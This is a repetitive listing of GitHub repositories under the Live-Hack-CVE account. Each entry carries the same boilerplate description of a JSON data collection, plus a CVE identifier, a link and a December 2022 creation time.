**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3524 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3524](https://github.com/Live-Hack-CVE/CVE-2021-3524) create time: 2022-12-24T06:21:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3531 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3531](https://github.com/Live-Hack-CVE/CVE-2021-3531) create time: 2022-12-24T06:21:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29509 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29509](https://github.com/Live-Hack-CVE/CVE-2021-29509) create time: 2022-12-24T06:21:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3528 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3528](https://github.com/Live-Hack-CVE/CVE-2021-3528) create time: 2022-12-24T06:21:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37704 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37704](https://github.com/Live-Hack-CVE/CVE-2021-37704) create time: 2022-12-24T06:20:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30638 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30638](https://github.com/Live-Hack-CVE/CVE-2021-30638) create time: 2022-12-24T06:20:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34621 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34621](https://github.com/Live-Hack-CVE/CVE-2021-34621) create time: 2022-12-24T06:20:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3446 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3446](https://github.com/Live-Hack-CVE/CVE-2021-3446) create time: 2022-12-24T06:20:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3493 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3493](https://github.com/Live-Hack-CVE/CVE-2021-3493) create time: 2022-12-24T06:20:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3038 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3038](https://github.com/Live-Hack-CVE/CVE-2021-3038) create time: 2022-12-24T06:20:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3448 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3448](https://github.com/Live-Hack-CVE/CVE-2021-3448) create time: 2022-12-24T06:20:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3462 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3462](https://github.com/Live-Hack-CVE/CVE-2021-3462) create time: 2022-12-24T06:20:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3487 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3487](https://github.com/Live-Hack-CVE/CVE-2021-3487) create time: 2022-12-24T06:20:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37705 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37705](https://github.com/Live-Hack-CVE/CVE-2021-37705) create time: 2022-12-24T06:20:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34730 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34730](https://github.com/Live-Hack-CVE/CVE-2021-34730) create time: 2022-12-24T06:20:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36006 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36006](https://github.com/Live-Hack-CVE/CVE-2021-36006) create time: 2022-12-24T06:19:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34434 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34434](https://github.com/Live-Hack-CVE/CVE-2021-34434) create time: 2022-12-24T06:19:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35221 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35221](https://github.com/Live-Hack-CVE/CVE-2021-35221) create time: 2022-12-24T06:19:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35213 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35213](https://github.com/Live-Hack-CVE/CVE-2021-35213) create time: 2022-12-24T06:19:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36029 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36029](https://github.com/Live-Hack-CVE/CVE-2021-36029) create time: 2022-12-24T06:19:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36002 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36002](https://github.com/Live-Hack-CVE/CVE-2021-36002) create time: 2022-12-24T06:19:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36041 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36041](https://github.com/Live-Hack-CVE/CVE-2021-36041) create time: 2022-12-24T06:19:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36034 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36034](https://github.com/Live-Hack-CVE/CVE-2021-36034) create time: 2022-12-24T06:19:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34435 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34435](https://github.com/Live-Hack-CVE/CVE-2021-34435) create time: 2022-12-24T06:19:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35995 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35995](https://github.com/Live-Hack-CVE/CVE-2021-35995) create time: 2022-12-24T06:19:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38312 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38312](https://github.com/Live-Hack-CVE/CVE-2021-38312) create time: 2022-12-24T06:19:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34785 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34785](https://github.com/Live-Hack-CVE/CVE-2021-34785) create time: 2022-12-24T06:19:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33207 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33207](https://github.com/Live-Hack-CVE/CVE-2022-33207) create time: 2022-12-24T06:17:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33206 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33206](https://github.com/Live-Hack-CVE/CVE-2022-33206) create time: 2022-12-24T06:17:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33204 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33204](https://github.com/Live-Hack-CVE/CVE-2022-33204) create time: 2022-12-24T06:17:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33205 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33205](https://github.com/Live-Hack-CVE/CVE-2022-33205) create time: 2022-12-24T06:17:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36313 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36313](https://github.com/Live-Hack-CVE/CVE-2022-36313) create time: 2022-12-24T06:17:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32323 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32323](https://github.com/Live-Hack-CVE/CVE-2022-32323) create time: 2022-12-24T06:17:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36783 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36783](https://github.com/Live-Hack-CVE/CVE-2022-36783) create time: 2022-12-24T06:17:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38195 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38195](https://github.com/Live-Hack-CVE/CVE-2022-38195) create time: 2022-12-24T06:17:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39837 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39837](https://github.com/Live-Hack-CVE/CVE-2022-39837) create time: 2022-12-24T06:16:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21291 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21291](https://github.com/Live-Hack-CVE/CVE-2022-21291) create time: 2022-12-24T06:16:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21427 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21427](https://github.com/Live-Hack-CVE/CVE-2022-21427) create time: 2022-12-24T06:16:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36323 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36323](https://github.com/Live-Hack-CVE/CVE-2022-36323) create time: 2022-12-24T06:16:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34911 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34911](https://github.com/Live-Hack-CVE/CVE-2022-34911) create time: 2022-12-24T06:16:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36325 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36325](https://github.com/Live-Hack-CVE/CVE-2022-36325) create time: 2022-12-24T06:16:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34912 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34912](https://github.com/Live-Hack-CVE/CVE-2022-34912) create time: 2022-12-24T06:16:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36946 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36946](https://github.com/Live-Hack-CVE/CVE-2022-36946) create time: 2022-12-24T06:16:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36324 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36324](https://github.com/Live-Hack-CVE/CVE-2022-36324) create time: 2022-12-24T06:16:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27816 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27816](https://github.com/Live-Hack-CVE/CVE-2022-27816) create time: 2022-12-24T06:16:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39836 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39836](https://github.com/Live-Hack-CVE/CVE-2022-39836) create time: 2022-12-24T06:16:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38135 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38135](https://github.com/Live-Hack-CVE/CVE-2022-38135) create time: 2022-12-24T06:15:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31129 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31129](https://github.com/Live-Hack-CVE/CVE-2022-31129) create time: 2022-12-24T06:15:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34465 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34465](https://github.com/Live-Hack-CVE/CVE-2022-34465) create time: 2022-12-24T06:15:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26373 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26373](https://github.com/Live-Hack-CVE/CVE-2022-26373) create time: 2022-12-24T06:15:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35822 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35822](https://github.com/Live-Hack-CVE/CVE-2022-35822) create time: 2022-12-24T06:15:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34711 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34711](https://github.com/Live-Hack-CVE/CVE-2022-34711) create time: 2022-12-24T06:15:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35887 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35887](https://github.com/Live-Hack-CVE/CVE-2022-35887) create time: 2022-12-24T06:15:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35884 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35884](https://github.com/Live-Hack-CVE/CVE-2022-35884) create time: 2022-12-24T06:15:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35886 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35886](https://github.com/Live-Hack-CVE/CVE-2022-35886) create time: 2022-12-24T06:15:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35885 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35885](https://github.com/Live-Hack-CVE/CVE-2022-35885) create time: 2022-12-24T06:15:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20676 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20676](https://github.com/Live-Hack-CVE/CVE-2022-20676) create time: 2022-12-24T06:14:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-1824 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-1824](https://github.com/Live-Hack-CVE/CVE-2013-1824) create time: 2022-12-24T04:59:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-9947 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-9947](https://github.com/Live-Hack-CVE/CVE-2017-9947) create time: 2022-12-24T04:36:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-9946 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-9946](https://github.com/Live-Hack-CVE/CVE-2017-9946) create time: 2022-12-24T04:36:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-1285 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-1285](https://github.com/Live-Hack-CVE/CVE-2018-1285) create time: 2022-12-24T04:59:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17498 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17498](https://github.com/Live-Hack-CVE/CVE-2019-17498) create time: 2022-12-24T04:58:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6142 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6142](https://github.com/Live-Hack-CVE/CVE-2019-6142) create time: 2022-12-24T04:58:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14593 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14593](https://github.com/Live-Hack-CVE/CVE-2020-14593) create time: 2022-12-24T04:56:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14621 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14621](https://github.com/Live-Hack-CVE/CVE-2020-14621) create time: 2022-12-24T04:56:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14579 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14579](https://github.com/Live-Hack-CVE/CVE-2020-14579) create time: 2022-12-24T04:43:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14581 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14581](https://github.com/Live-Hack-CVE/CVE-2020-14581) create time: 2022-12-24T04:43:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14578 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14578](https://github.com/Live-Hack-CVE/CVE-2020-14578) create time: 2022-12-24T04:43:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14583 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14583](https://github.com/Live-Hack-CVE/CVE-2020-14583) create time: 2022-12-24T04:43:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14573 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14573](https://github.com/Live-Hack-CVE/CVE-2020-14573) create time: 2022-12-24T04:43:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14577 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14577](https://github.com/Live-Hack-CVE/CVE-2020-14577) create time: 2022-12-24T04:43:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14556 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14556](https://github.com/Live-Hack-CVE/CVE-2020-14556) create time: 2022-12-24T04:43:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2805 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2805](https://github.com/Live-Hack-CVE/CVE-2020-2805) create time: 2022-12-24T04:43:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2803 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2803](https://github.com/Live-Hack-CVE/CVE-2020-2803) create time: 2022-12-24T04:43:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2800 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2800](https://github.com/Live-Hack-CVE/CVE-2020-2800) create time: 2022-12-24T04:43:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2755 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2755](https://github.com/Live-Hack-CVE/CVE-2020-2755) create time: 2022-12-24T04:43:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2585 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2585](https://github.com/Live-Hack-CVE/CVE-2020-2585) create time: 2022-12-24T04:43:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2756 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2756](https://github.com/Live-Hack-CVE/CVE-2020-2756) create time: 2022-12-24T04:43:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2757 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2757](https://github.com/Live-Hack-CVE/CVE-2020-2757) create time: 2022-12-24T04:43:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8475 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8475](https://github.com/Live-Hack-CVE/CVE-2020-8475) create time: 2022-12-24T04:40:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8479 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8479](https://github.com/Live-Hack-CVE/CVE-2020-8479) create time: 2022-12-24T04:40:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8476 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8476](https://github.com/Live-Hack-CVE/CVE-2020-8476) create time: 2022-12-24T04:40:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-18151 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-18151](https://github.com/Live-Hack-CVE/CVE-2020-18151) create time: 2022-12-24T04:39:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30560 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30560](https://github.com/Live-Hack-CVE/CVE-2021-30560) create time: 2022-12-24T04:59:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25118 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25118](https://github.com/Live-Hack-CVE/CVE-2021-25118) create time: 2022-12-24T04:59:26Z

